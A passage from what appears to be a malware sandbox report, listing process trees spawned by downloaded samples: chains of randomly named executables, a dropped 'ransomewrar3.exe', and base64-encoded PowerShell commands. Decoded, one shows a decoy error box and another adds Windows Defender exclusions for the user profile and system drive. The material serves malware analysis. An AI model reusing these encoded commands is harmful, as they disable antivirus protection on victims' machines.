        C:\Windows\system32\Qdoacabq.exe
        9⤵
        
        PID:3852
        
        C:\Windows\SysWOW64\Qdaniq32.exe
        
        C:\Windows\system32\Qdaniq32.exe
        10⤵
        
        PID:6612
        
        C:\Windows\SysWOW64\Aogbfi32.exe
        
        C:\Windows\system32\Aogbfi32.exe
        11⤵
        
        PID:6848
        
        C:\Windows\SysWOW64\Aknbkjfh.exe
        
        C:\Windows\system32\Aknbkjfh.exe
        12⤵
        
        PID:1832
        
        C:\Windows\SysWOW64\Amqhbe32.exe
        
        C:\Windows\system32\Amqhbe32.exe
        13⤵
        
        PID:4500
        
        C:\Windows\SysWOW64\Apaadpng.exe
        
        C:\Windows\system32\Apaadpng.exe
        14⤵
        
        PID:5436
        
        C:\Windows\SysWOW64\Bmeandma.exe
        
        C:\Windows\system32\Bmeandma.exe
        15⤵
        
        PID:5792
        
        C:\Windows\SysWOW64\Bgnffj32.exe
        
        C:\Windows\system32\Bgnffj32.exe
        16⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\Bpfkpp32.exe
        
        C:\Windows\system32\Bpfkpp32.exe
        17⤵
        
        PID:1104
        
        C:\Windows\SysWOW64\Bddcenpi.exe
        
        C:\Windows\system32\Bddcenpi.exe
        18⤵
        
        PID:1336
        
        C:\Windows\SysWOW64\Bdfpkm32.exe
        
        C:\Windows\system32\Bdfpkm32.exe
        19⤵
        
        PID:2416
        
        C:\Windows\SysWOW64\Ckebcg32.exe
        
        C:\Windows\system32\Ckebcg32.exe
        20⤵
        
        PID:664
        
        C:\Windows\SysWOW64\Cglbhhga.exe
        
        C:\Windows\system32\Cglbhhga.exe
        21⤵
        
        PID:5532
        
        C:\Windows\SysWOW64\Chkobkod.exe
        
        C:\Windows\system32\Chkobkod.exe
        22⤵
        
        PID:1720
        
        C:\Windows\SysWOW64\Dafppp32.exe
        
        C:\Windows\system32\Dafppp32.exe
        23⤵
        
        PID:4756
        
        C:\Windows\SysWOW64\Ddifgk32.exe
        
        C:\Windows\system32\Ddifgk32.exe
        24⤵
        
        PID:2664
        
        C:\Windows\SysWOW64\Dqpfmlce.exe
        
        C:\Windows\system32\Dqpfmlce.exe
        25⤵
        
        PID:3832
        
        C:\Windows\SysWOW64\Dhikci32.exe
        
        C:\Windows\system32\Dhikci32.exe
        26⤵
        
        PID:3604
        
        C:\Windows\SysWOW64\Edplhjhi.exe
        
        C:\Windows\system32\Edplhjhi.exe
        27⤵
        
        PID:7012
        
        C:\Windows\SysWOW64\Eojiqb32.exe
        
        C:\Windows\system32\Eojiqb32.exe
        28⤵
        
        PID:4760
        
        C:\Windows\SysWOW64\Eqlfhjig.exe
        
        C:\Windows\system32\Eqlfhjig.exe
        29⤵
        
        PID:3192
        
        C:\Windows\SysWOW64\Eomffaag.exe
        
        C:\Windows\system32\Eomffaag.exe
        30⤵
        
        PID:4492
        
        C:\Windows\SysWOW64\Fooclapd.exe
        
        C:\Windows\system32\Fooclapd.exe
        31⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\Figgdg32.exe
        
        C:\Windows\system32\Figgdg32.exe
        32⤵
        
        PID:5132
        
        C:\Windows\SysWOW64\Fgoakc32.exe
        
        C:\Windows\system32\Fgoakc32.exe
        33⤵
        
        PID:5192
        
        C:\Windows\SysWOW64\Fiqjke32.exe
        
        C:\Windows\system32\Fiqjke32.exe
        34⤵
        
        PID:6292
        
        C:\Windows\SysWOW64\Giecfejd.exe
        
        C:\Windows\system32\Giecfejd.exe
        35⤵
        
        PID:1408
        
        C:\Windows\SysWOW64\Gihpkd32.exe
        
        C:\Windows\system32\Gihpkd32.exe
        36⤵
        
        PID:6392
        
        C:\Windows\SysWOW64\Gaebef32.exe
        
        C:\Windows\system32\Gaebef32.exe
        37⤵
        
        PID:5124
        
        C:\Windows\SysWOW64\Hbgkei32.exe
        
        C:\Windows\system32\Hbgkei32.exe
        38⤵
        
        PID:6528
        
        C:\Windows\SysWOW64\Haodle32.exe
        
        C:\Windows\system32\Haodle32.exe
        39⤵
        
        PID:3056
        
        C:\Windows\SysWOW64\Hemmac32.exe
        
        C:\Windows\system32\Hemmac32.exe
        40⤵
        
        PID:6752
        
        C:\Windows\SysWOW64\Iijfhbhl.exe
        
        C:\Windows\system32\Iijfhbhl.exe
        41⤵
        
        PID:6508
        
        C:\Windows\SysWOW64\Ipgkjlmg.exe
        
        C:\Windows\system32\Ipgkjlmg.exe
        42⤵
        
        PID:6980
        
        C:\Windows\SysWOW64\Jbojlfdp.exe
        
        C:\Windows\system32\Jbojlfdp.exe
        43⤵
        
        PID:5400
        
        C:\Windows\SysWOW64\Jlikkkhn.exe
        
        C:\Windows\system32\Jlikkkhn.exe
        44⤵
        
        PID:3964
        
        C:\Windows\SysWOW64\Jeapcq32.exe
        
        C:\Windows\system32\Jeapcq32.exe
        45⤵
        
        PID:1464
        
        C:\Windows\SysWOW64\Jahqiaeb.exe
        
        C:\Windows\system32\Jahqiaeb.exe
        46⤵
        
        PID:6676
        
        C:\Windows\SysWOW64\Kpiqfima.exe
        
        C:\Windows\system32\Kpiqfima.exe
        47⤵
        
        PID:6608
        
        C:\Windows\SysWOW64\Khgbqkhj.exe
        
        C:\Windows\system32\Khgbqkhj.exe
        48⤵
        
        PID:1520
        
        C:\Windows\SysWOW64\Kofdhd32.exe
        
        C:\Windows\system32\Kofdhd32.exe
        49⤵
        
        PID:7092
        
        C:\Windows\SysWOW64\Lpepbgbd.exe
        
        C:\Windows\system32\Lpepbgbd.exe
        50⤵
        
        PID:1848
        
        C:\Windows\SysWOW64\Lcfidb32.exe
        
        C:\Windows\system32\Lcfidb32.exe
        51⤵
        
        PID:400
        
        C:\Windows\SysWOW64\Lpjjmg32.exe
        
        C:\Windows\system32\Lpjjmg32.exe
        52⤵
        
        PID:532
        
        C:\Windows\SysWOW64\Ljbnfleo.exe
        
        C:\Windows\system32\Ljbnfleo.exe
        53⤵
        
        PID:3520
        
        C:\Windows\SysWOW64\Lckboblp.exe
        
        C:\Windows\system32\Lckboblp.exe
        54⤵
        
        PID:1620
        
        C:\Windows\SysWOW64\Loacdc32.exe
        
        C:\Windows\system32\Loacdc32.exe
        55⤵
        
        PID:3268
        
        C:\Windows\SysWOW64\Modpib32.exe
        
        C:\Windows\system32\Modpib32.exe
        56⤵
        
        PID:7084
        
        C:\Windows\SysWOW64\Mpclce32.exe
        
        C:\Windows\system32\Mpclce32.exe
        57⤵
        
        PID:2432
        
        C:\Windows\SysWOW64\Mjpjgj32.exe
        
        C:\Windows\system32\Mjpjgj32.exe
        58⤵
        
        PID:4972
        
        C:\Windows\SysWOW64\Nhegig32.exe
        
        C:\Windows\system32\Nhegig32.exe
        59⤵
        
        PID:6724
        
        C:\Windows\SysWOW64\Nhhdnf32.exe
        
        C:\Windows\system32\Nhhdnf32.exe
        60⤵
        
        PID:2468
        
        C:\Windows\SysWOW64\Nodiqp32.exe
        
        C:\Windows\system32\Nodiqp32.exe
        61⤵
        
        PID:5172
        
        C:\Windows\SysWOW64\Niojoeel.exe
        
        C:\Windows\system32\Niojoeel.exe
        62⤵
        
        PID:6644
        
        C:\Windows\SysWOW64\Oiagde32.exe
        
        C:\Windows\system32\Oiagde32.exe
        63⤵
        
        PID:6164
        
        C:\Windows\SysWOW64\Omopjcjp.exe
        
        C:\Windows\system32\Omopjcjp.exe
        64⤵
        
        PID:3180
        
        C:\Windows\SysWOW64\Ocnabm32.exe
        
        C:\Windows\system32\Ocnabm32.exe
        65⤵
        
        PID:6616
        
        C:\Windows\SysWOW64\Pcbkml32.exe
        
        C:\Windows\system32\Pcbkml32.exe
        66⤵
        
        PID:7192
        
        C:\Windows\SysWOW64\Qjffpe32.exe
        
        C:\Windows\system32\Qjffpe32.exe
        67⤵
        
        PID:7524
    - - C:\Users\Admin\Downloads\240919-hmhq7awbnb5f843a03f1310225137d1e36f8c154b9e7388ddd6dcf616e454e758e763412fdN.exe
        
        C:\Users\Admin\Downloads\240919-hmhq7awbnb5f843a03f1310225137d1e36f8c154b9e7388ddd6dcf616e454e758e763412fdN.exe
        5⤵
        
        PID:6760
      - C:\Windows\SysWOW64\Bgelgi32.exe
        
        C:\Windows\system32\Bgelgi32.exe
        6⤵
        
        PID:5592
        
        C:\Windows\SysWOW64\Conanfli.exe
        
        C:\Windows\system32\Conanfli.exe
        7⤵
        
        PID:828
        
        C:\Windows\SysWOW64\Cgifbhid.exe
        
        C:\Windows\system32\Cgifbhid.exe
        8⤵
        
        PID:1100
        
        C:\Windows\SysWOW64\Cdpcal32.exe
        
        C:\Windows\system32\Cdpcal32.exe
        9⤵
        
        PID:6488
        
        C:\Windows\SysWOW64\Dahmfpap.exe
        
        C:\Windows\system32\Dahmfpap.exe
        10⤵
        
        PID:5996
        
        C:\Windows\SysWOW64\Doagjc32.exe
        
        C:\Windows\system32\Doagjc32.exe
        11⤵
        
        PID:6560
        
        C:\Windows\SysWOW64\Ehlhih32.exe
        
        C:\Windows\system32\Ehlhih32.exe
        12⤵
        
        PID:6588
        
        C:\Windows\SysWOW64\Eohmkb32.exe
        
        C:\Windows\system32\Eohmkb32.exe
        13⤵
        
        PID:6960
        
        C:\Windows\SysWOW64\Ehbnigjj.exe
        
        C:\Windows\system32\Ehbnigjj.exe
        14⤵
        
        PID:5076
        
        C:\Windows\SysWOW64\Eiekog32.exe
        
        C:\Windows\system32\Eiekog32.exe
        15⤵
        
        PID:3592
        
        C:\Windows\SysWOW64\Feqeog32.exe
        
        C:\Windows\system32\Feqeog32.exe
        16⤵
        
        PID:1996
        
        C:\Windows\SysWOW64\Fqgedh32.exe
        
        C:\Windows\system32\Fqgedh32.exe
        17⤵
        
        PID:6700
        
        C:\Windows\SysWOW64\Fajbjh32.exe
        
        C:\Windows\system32\Fajbjh32.exe
        18⤵
        
        PID:3560
        
        C:\Windows\SysWOW64\Gkdpbpih.exe
        
        C:\Windows\system32\Gkdpbpih.exe
        19⤵
        
        PID:1416
        
        C:\Windows\SysWOW64\Gndick32.exe
        
        C:\Windows\system32\Gndick32.exe
        20⤵
        
        PID:6220
        
        C:\Windows\SysWOW64\Heegad32.exe
        
        C:\Windows\system32\Heegad32.exe
        21⤵
        
        PID:2012
        
        C:\Windows\SysWOW64\Hifmmb32.exe
        
        C:\Windows\system32\Hifmmb32.exe
        22⤵
        
        PID:5420
        
        C:\Windows\SysWOW64\Ilibdmgp.exe
        
        C:\Windows\system32\Ilibdmgp.exe
        23⤵
        
        PID:2340
        
        C:\Windows\SysWOW64\Iimcma32.exe
        
        C:\Windows\system32\Iimcma32.exe
        24⤵
        
        PID:5760
        
        C:\Windows\SysWOW64\Ipihpkkd.exe
        
        C:\Windows\system32\Ipihpkkd.exe
        25⤵
        
        PID:6084
        
        C:\Windows\SysWOW64\Jocnlg32.exe
        
        C:\Windows\system32\Jocnlg32.exe
        26⤵
        
        PID:936
        
        C:\Windows\SysWOW64\Jbccge32.exe
        
        C:\Windows\system32\Jbccge32.exe
        27⤵
        
        PID:6324
        
        C:\Windows\SysWOW64\Jhplpl32.exe
        
        C:\Windows\system32\Jhplpl32.exe
        28⤵
        
        PID:6516
        
        C:\Windows\SysWOW64\Kpiqfima.exe
        
        C:\Windows\system32\Kpiqfima.exe
        29⤵
        
        PID:6708
        
        C:\Windows\SysWOW64\Kplmliko.exe
        
        C:\Windows\system32\Kplmliko.exe
        30⤵
        
        PID:1220
        
        C:\Windows\SysWOW64\Kapfiqoj.exe
        
        C:\Windows\system32\Kapfiqoj.exe
        31⤵
        
        PID:4220
        
        C:\Windows\SysWOW64\Kemooo32.exe
        
        C:\Windows\system32\Kemooo32.exe
        32⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\Lllagh32.exe
        
        C:\Windows\system32\Lllagh32.exe
        33⤵
        
        PID:7060
        
        C:\Windows\SysWOW64\Lomjicei.exe
        
        C:\Windows\system32\Lomjicei.exe
        34⤵
        
        PID:1744
        
        C:\Windows\SysWOW64\Lancko32.exe
        
        C:\Windows\system32\Lancko32.exe
        35⤵
        
        PID:5228
        
        C:\Windows\SysWOW64\Mablfnne.exe
        
        C:\Windows\system32\Mablfnne.exe
        36⤵
        
        PID:6984
        
        C:\Windows\SysWOW64\Mlljnf32.exe
        
        C:\Windows\system32\Mlljnf32.exe
        37⤵
        
        PID:3248
        
        C:\Windows\SysWOW64\Mhckcgpj.exe
        
        C:\Windows\system32\Mhckcgpj.exe
        38⤵
        
        PID:3648
        
        C:\Windows\SysWOW64\Nmaciefp.exe
        
        C:\Windows\system32\Nmaciefp.exe
        39⤵
        
        PID:6384
        
        C:\Windows\SysWOW64\Ommceclc.exe
        
        C:\Windows\system32\Ommceclc.exe
        40⤵
        
        PID:6792
        
        C:\Windows\SysWOW64\Ofgdcipq.exe
        
        C:\Windows\system32\Ofgdcipq.exe
        41⤵
        
        PID:1448
        
        C:\Windows\SysWOW64\Obnehj32.exe
        
        C:\Windows\system32\Obnehj32.exe
        42⤵
        
        PID:2740
        
        C:\Windows\SysWOW64\Piocecgj.exe
        
        C:\Windows\system32\Piocecgj.exe
        43⤵
        
        PID:7228
        
        C:\Windows\SysWOW64\Pakdbp32.exe
        
        C:\Windows\system32\Pakdbp32.exe
        44⤵
        
        PID:7436
        
        C:\Windows\SysWOW64\Qjffpe32.exe
        
        C:\Windows\system32\Qjffpe32.exe
        45⤵
        
        PID:7536
        
        C:\Windows\SysWOW64\Apggckbf.exe
        
        C:\Windows\system32\Apggckbf.exe
        46⤵
        
        PID:7736
        
        C:\Windows\SysWOW64\Apjdikqd.exe
        
        C:\Windows\system32\Apjdikqd.exe
        47⤵
        
        PID:7836
        
        C:\Windows\SysWOW64\Aplaoj32.exe
        
        C:\Windows\system32\Aplaoj32.exe
        48⤵
        
        PID:7964
        
        C:\Windows\SysWOW64\Abmjqe32.exe
        
        C:\Windows\system32\Abmjqe32.exe
        49⤵
        
        PID:8116
        
        C:\Windows\SysWOW64\Bfmolc32.exe
        
        C:\Windows\system32\Bfmolc32.exe
        50⤵
        
        PID:7176
        
        C:\Windows\SysWOW64\Bdapehop.exe
        
        C:\Windows\system32\Bdapehop.exe
        51⤵
        
        PID:3992
        
        C:\Windows\SysWOW64\Bagmdllg.exe
        
        C:\Windows\system32\Bagmdllg.exe
        52⤵
        
        PID:7328
    - - C:\Users\Admin\Downloads\240919-hme1aswdnqad491ca60a1ea8b3330a50026c7076ae7eba19762040caab98218a3d94d6575fN.exe
        
        C:\Users\Admin\Downloads\240919-hme1aswdnqad491ca60a1ea8b3330a50026c7076ae7eba19762040caab98218a3d94d6575fN.exe
        5⤵
        
        PID:1484
      - C:\Windows\SysWOW64\Cglbhhga.exe
        
        C:\Windows\system32\Cglbhhga.exe
        6⤵
        
        PID:6236
        
        C:\Windows\SysWOW64\Cpdgqmnb.exe
        
        C:\Windows\system32\Cpdgqmnb.exe
        7⤵
        
        PID:6824
        
        C:\Windows\SysWOW64\Dpiplm32.exe
        
        C:\Windows\system32\Dpiplm32.exe
        8⤵
        
        PID:5396
        
        C:\Windows\SysWOW64\Ddifgk32.exe
        
        C:\Windows\system32\Ddifgk32.exe
        9⤵
        
        PID:2356
        
        C:\Windows\SysWOW64\Dhgonidg.exe
        
        C:\Windows\system32\Dhgonidg.exe
        10⤵
        
        PID:4008
        
        C:\Windows\SysWOW64\Dglkoeio.exe
        
        C:\Windows\system32\Dglkoeio.exe
        11⤵
        
        PID:6636
        
        C:\Windows\SysWOW64\Egaejeej.exe
        
        C:\Windows\system32\Egaejeej.exe
        12⤵
        
        PID:1868
        
        C:\Windows\SysWOW64\Egcaod32.exe
        
        C:\Windows\system32\Egcaod32.exe
        13⤵
        
        PID:5224
        
        C:\Windows\SysWOW64\Fqppci32.exe
        
        C:\Windows\system32\Fqppci32.exe
        14⤵
        
        PID:452
        
        C:\Windows\SysWOW64\Filapfbo.exe
        
        C:\Windows\system32\Filapfbo.exe
        15⤵
        
        PID:5612
    - - C:\Users\Admin\Downloads\240919-hmc6pswdnn1c8a1a2f42fd70f262b091743ad8853b9ab7884f21c9c8a5b0145c5e74880ed5N.exe
        
        C:\Users\Admin\Downloads\240919-hmc6pswdnn1c8a1a2f42fd70f262b091743ad8853b9ab7884f21c9c8a5b0145c5e74880ed5N.exe
        5⤵
        
        PID:4828
    - - C:\Users\Admin\Downloads\240919-hl24fawbke51046434636ee20141e62e18698b72081872c53a39c2173df905bba4513b8f2fN.exe
        
        C:\Users\Admin\Downloads\240919-hl24fawbke51046434636ee20141e62e18698b72081872c53a39c2173df905bba4513b8f2fN.exe
        5⤵
        
        PID:3744
      - C:\Windows\SysWOW64\Feqeog32.exe
        
        C:\Windows\system32\Feqeog32.exe
        6⤵
        
        PID:948
        
        C:\Windows\SysWOW64\Fqgedh32.exe
        
        C:\Windows\system32\Fqgedh32.exe
        7⤵
        
        PID:4984
        
        C:\Windows\SysWOW64\Feenjgfq.exe
        
        C:\Windows\system32\Feenjgfq.exe
        8⤵
        
        PID:6088
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6088 -s 408
        9⤵
        Program crash
        
        PID:2804
        
        C:\Windows\SysWOW64\K0L4B0R451.exe
        
        "C:\Windows\system32\K0L4B0R451.exe"
        10⤵
        
        PID:3540
        
        C:\Windows\SysWOW64\K0L4B0R451.exe
        
        "C:\Windows\system32\K0L4B0R451.exe"
        10⤵
        
        PID:5852
    - - C:\Users\Admin\Downloads\240919-hk7brswdjqeaca4be488cd57107299ee54406acbae_JaffaCakes118.exe
        
        C:\Users\Admin\Downloads\240919-hk7brswdjqeaca4be488cd57107299ee54406acbae_JaffaCakes118.exe
        5⤵
        
        PID:6360
    - - C:\Users\Admin\Downloads\240919-hl48sswbkgPanelExecutorV11.exe
        
        C:\Users\Admin\Downloads\240919-hl48sswbkgPanelExecutorV11.exe
        5⤵
        
        PID:444
      - C:\Windows\SysWOW64\4K51K4.exe
        
        "C:\Windows\system32\4K51K4.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"-EncodedCommand "PAAjAGwAcQB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHQAZQBkACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVwBvAHIAawBpAG4AZwAgAGoAdQBzAHQAIABjAGwAaQBjAGsAIABvAGsAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGUAcQBoACMAPgA="
        6⤵
        
        PID:6360
      - C:\Windows\SysWOW64\4K51K4.exe
        
        "C:\Windows\system32\4K51K4.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"-EncodedCommand "PAAjAGQAawBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAYgBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAagB2ACMAPgA="
        6⤵
        
        PID:5312
      - C:\Windows\SysWOW64\4K51K4.exe
        
        "C:\Windows\system32\4K51K4.exe" "C:\Users\Admin\AppData\Local\Temp\ransomewrar3.exe"
        6⤵
        
        PID:7368
    - - C:\Users\Admin\Downloads\240919-hlbw9awarb9508c09d7dfb89931ad49cacba2daf4b3f306303c2815af7f07bc63ffaffb002N.exe
        
        C:\Users\Admin\Downloads\240919-hlbw9awarb9508c09d7dfb89931ad49cacba2daf4b3f306303c2815af7f07bc63ffaffb002N.exe
        5⤵
        
        PID:5860
      - C:\Windows\SysWOW64\Pmphaaln.exe
        
        C:\Windows\system32\Pmphaaln.exe
        6⤵
        
        PID:7404
        
        C:\Windows\SysWOW64\Qfmfefni.exe
        
        C:\Windows\system32\Qfmfefni.exe
        7⤵
        
        PID:7648
        
        C:\Windows\SysWOW64\Apggckbf.exe
        
        C:\Windows\system32\Apggckbf.exe
        8⤵
        
        PID:7748
        
        C:\Windows\SysWOW64\Adepji32.exe
        
        C:\Windows\system32\Adepji32.exe
        9⤵
        
        PID:7868
        
        C:\Windows\SysWOW64\Adgmoigj.exe
        
        C:\Windows\system32\Adgmoigj.exe
        10⤵
        
        PID:8000
        
        C:\Windows\SysWOW64\Bigbmpco.exe
        
        C:\Windows\system32\Bigbmpco.exe
        11⤵
        
        PID:8164
        
        C:\Windows\SysWOW64\Biiobo32.exe
        
        C:\Windows\system32\Biiobo32.exe
        12⤵
        
        PID:7120
        
        C:\Windows\SysWOW64\Bkkhbb32.exe
        
        C:\Windows\system32\Bkkhbb32.exe
        13⤵
        
        PID:4092
        
        C:\Windows\SysWOW64\Bagmdllg.exe
        
        C:\Windows\system32\Bagmdllg.exe
        14⤵
        
        PID:2920
        
        C:\Windows\SysWOW64\Cmnnimak.exe
        
        C:\Windows\system32\Cmnnimak.exe
        15⤵
        
        PID:4380
        
        C:\Windows\SysWOW64\Cmpjoloh.exe
        
        C:\Windows\system32\Cmpjoloh.exe
        16⤵
        
        PID:7644
        
        C:\Windows\SysWOW64\Diqnjl32.exe
        
        C:\Windows\system32\Diqnjl32.exe
        17⤵
        
        PID:3400
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3400 -s 408
        18⤵
        Program crash
        
        PID:6244
        
        C:\Windows\SysWOW64\K0L4B0R451.exe
        
        "C:\Windows\system32\K0L4B0R451.exe"
        19⤵
        
        PID:7216
        
        C:\Windows\SysWOW64\K0L4B0R451.exe
        
        "C:\Windows\system32\K0L4B0R451.exe"
        19⤵
        
        PID:5884
    - - C:\Users\Admin\Downloads\240919-hkrw3swcrjfile.exe
        
        C:\Users\Admin\Downloads\240919-hkrw3swcrjfile.exe
        5⤵
        
        PID:7612
    - - C:\Users\Admin\Downloads\240919-hk1h8awdjjbc1f7d7dd47d8221676316b4eba81e38a9a80c3981c84f87507e5a54ea736ad7N.exe
        
        C:\Users\Admin\Downloads\240919-hk1h8awdjjbc1f7d7dd47d8221676316b4eba81e38a9a80c3981c84f87507e5a54ea736ad7N.exe
        5⤵
        
        PID:7924
      - C:\Windows\SysWOW64\Dknnoofg.exe
        
        C:\Windows\system32\Dknnoofg.exe
        6⤵
        
        PID:8136
        
        C:\Windows\SysWOW64\Dkbgjo32.exe
        
        C:\Windows\system32\Dkbgjo32.exe
        7⤵
        
        PID:6408
        
        C:\Windows\SysWOW64\Ejlnfjbd.exe
        
        C:\Windows\system32\Ejlnfjbd.exe
        8⤵
        
        PID:7272
        
        C:\Windows\SysWOW64\Ephbhd32.exe
        
        C:\Windows\system32\Ephbhd32.exe
        9⤵
        
        PID:5944
        
        C:\Windows\SysWOW64\Ejccgi32.exe
        
        C:\Windows\system32\Ejccgi32.exe
        10⤵
        
        PID:5140
        
        C:\Windows\SysWOW64\Fgnjqm32.exe
        
        C:\Windows\system32\Fgnjqm32.exe
        11⤵
        
        PID:8188
        
        C:\Windows\SysWOW64\Fcekfnkb.exe
        
        C:\Windows\system32\Fcekfnkb.exe
        12⤵
        
        PID:7532
        
        C:\Windows\SysWOW64\Ggccllai.exe
        
        C:\Windows\system32\Ggccllai.exe
        13⤵
        
        PID:7884
        
        C:\Windows\SysWOW64\Ggjjlk32.exe
        
        C:\Windows\system32\Ggjjlk32.exe
        14⤵
        
        PID:8052
        
        C:\Windows\SysWOW64\Hccggl32.exe
        
        C:\Windows\system32\Hccggl32.exe
        15⤵
        
        PID:2632
        
        C:\Windows\SysWOW64\Hebcao32.exe
        
        C:\Windows\system32\Hebcao32.exe
        16⤵
        
        PID:5556
        
        C:\Windows\SysWOW64\Hbfdjc32.exe
        
        C:\Windows\system32\Hbfdjc32.exe
        17⤵
        
        PID:7712
        
        C:\Windows\SysWOW64\Hejjanpm.exe
        
        C:\Windows\system32\Hejjanpm.exe
        18⤵
        
        PID:5680
        
        C:\Windows\SysWOW64\Indkpcdk.exe
        
        C:\Windows\system32\Indkpcdk.exe
        19⤵
        
        PID:5484
        
        C:\Windows\SysWOW64\Iholohii.exe
        
        C:\Windows\system32\Iholohii.exe
        20⤵
        
        PID:4976
        
        C:\Windows\SysWOW64\Ijpepcfj.exe
        
        C:\Windows\system32\Ijpepcfj.exe
        21⤵
        
        PID:6536
        
        C:\Windows\SysWOW64\Jlanpfkj.exe
        
        C:\Windows\system32\Jlanpfkj.exe
        22⤵
        
        PID:7188
        
        C:\Windows\SysWOW64\Jnedgq32.exe
        
        C:\Windows\system32\Jnedgq32.exe
        23⤵
        
        PID:3520
        
        C:\Windows\SysWOW64\Jeaiij32.exe
        
        C:\Windows\system32\Jeaiij32.exe
        24⤵
        
        PID:5900
        
        C:\Windows\SysWOW64\Kbgfhnhi.exe
        
        C:\Windows\system32\Kbgfhnhi.exe
        25⤵
        
        PID:5676
        
        C:\Windows\SysWOW64\Lknjhokg.exe
        
        C:\Windows\system32\Lknjhokg.exe
        26⤵
        
        PID:7876
        
        C:\Windows\SysWOW64\Loopdmpk.exe
        
        C:\Windows\system32\Loopdmpk.exe
        27⤵
        
        PID:5684
        
        C:\Windows\SysWOW64\Moefdljc.exe
        
        C:\Windows\system32\Moefdljc.exe
        28⤵
        
        PID:6904
        
        C:\Windows\SysWOW64\Nkeipk32.exe
        
        C:\Windows\system32\Nkeipk32.exe
        29⤵
        
        PID:7984
        
        C:\Windows\SysWOW64\Nkjckkcg.exe
        
        C:\Windows\system32\Nkjckkcg.exe
        30⤵
        
        PID:7760
        
        C:\Windows\SysWOW64\Oljoen32.exe
        
        C:\Windows\system32\Oljoen32.exe
        31⤵
        
        PID:7500
        
        C:\Windows\SysWOW64\Ochamg32.exe
        
        C:\Windows\system32\Ochamg32.exe
        32⤵
        
        PID:1700
        
        C:\Windows\SysWOW64\Pbddobla.exe
        
        C:\Windows\system32\Pbddobla.exe
        33⤵
        
        PID:6900
        
        C:\Windows\SysWOW64\Peempn32.exe
        
        C:\Windows\system32\Peempn32.exe
        34⤵
        
        PID:5168
        
        C:\Windows\SysWOW64\Pmoagk32.exe
        
        C:\Windows\system32\Pmoagk32.exe
        35⤵
        
        PID:664
        
        C:\Windows\SysWOW64\Qkdohg32.exe
        
        C:\Windows\system32\Qkdohg32.exe
        36⤵
        
        PID:6508
        
        C:\Windows\SysWOW64\Aimhmkgn.exe
        
        C:\Windows\system32\Aimhmkgn.exe
        37⤵
        
        PID:6220
        
        C:\Windows\SysWOW64\Acdioc32.exe
        
        C:\Windows\system32\Acdioc32.exe
        38⤵
        
        PID:7708
        
        C:\Windows\SysWOW64\Afeban32.exe
        
        C:\Windows\system32\Afeban32.exe
        39⤵
        
        PID:6708
        
        C:\Windows\SysWOW64\Bejobk32.exe
        
        C:\Windows\system32\Bejobk32.exe
        40⤵
        
        PID:5308
        
        C:\Windows\SysWOW64\Bmfqngcg.exe
        
        C:\Windows\system32\Bmfqngcg.exe
        41⤵
        
        PID:7136
        
        C:\Windows\SysWOW64\Bbefln32.exe
        
        C:\Windows\system32\Bbefln32.exe
        42⤵
        
        PID:6848
        
        C:\Windows\SysWOW64\Cffkhl32.exe
        
        C:\Windows\system32\Cffkhl32.exe
        43⤵
        
        PID:7240
        
        C:\Windows\SysWOW64\Dllffa32.exe
        
        C:\Windows\system32\Dllffa32.exe
        44⤵
        
        PID:1536
        
        C:\Windows\SysWOW64\Defheg32.exe
        
        C:\Windows\system32\Defheg32.exe
        45⤵
        
        PID:5132
        
        C:\Windows\SysWOW64\Dpoiho32.exe
        
        C:\Windows\system32\Dpoiho32.exe
        46⤵
        
        PID:7140
        
        C:\Windows\SysWOW64\Eincadmf.exe
        
        C:\Windows\system32\Eincadmf.exe
        47⤵
        
        PID:2664
        
        C:\Windows\SysWOW64\Fcpkph32.exe
        
        C:\Windows\system32\Fcpkph32.exe
        48⤵
        
        PID:3852
        
        C:\Windows\SysWOW64\Glmhdm32.exe
        
        C:\Windows\system32\Glmhdm32.exe
        49⤵
        
        PID:7620
        
        C:\Windows\SysWOW64\Gfgjbb32.exe
        
        C:\Windows\system32\Gfgjbb32.exe
        50⤵
        
        PID:7112
        
        C:\Windows\SysWOW64\Gjebiq32.exe
        
        C:\Windows\system32\Gjebiq32.exe
        51⤵
        
        PID:8116
        
        C:\Windows\SysWOW64\Hmmakk32.exe
        
        C:\Windows\system32\Hmmakk32.exe
        52⤵
        
        PID:8144
        
        C:\Windows\SysWOW64\Hdffah32.exe
        
        C:\Windows\system32\Hdffah32.exe
        53⤵
        
        PID:4676
        
        C:\Windows\SysWOW64\Hdicggla.exe
        
        C:\Windows\system32\Hdicggla.exe
        54⤵
        
        PID:6044
    - - C:\Users\Admin\Downloads\240919-hjz63awcnpeac97d7e01d0b3b14f85bb97239ecac5_JaffaCakes118.exe
        
        C:\Users\Admin\Downloads\240919-hjz63awcnpeac97d7e01d0b3b14f85bb97239ecac5_JaffaCakes118.exe
        5⤵
        
        PID:5428
      - C:\Windows\SysWOW64\4K51K4.exe
        
        "C:\Windows\system32\4K51K4.exe" "C:\Users\Admin\AppData\Local\Temp\WYHS.exe"
        6⤵
        
        PID:2964
      - C:\Windows\SysWOW64\4K51K4.exe
        
        "C:\Windows\system32\4K51K4.exe" "C:\Users\Admin\AppData\Local\Temp\Ð¡·ãpao1011_.exe"
        6⤵
        
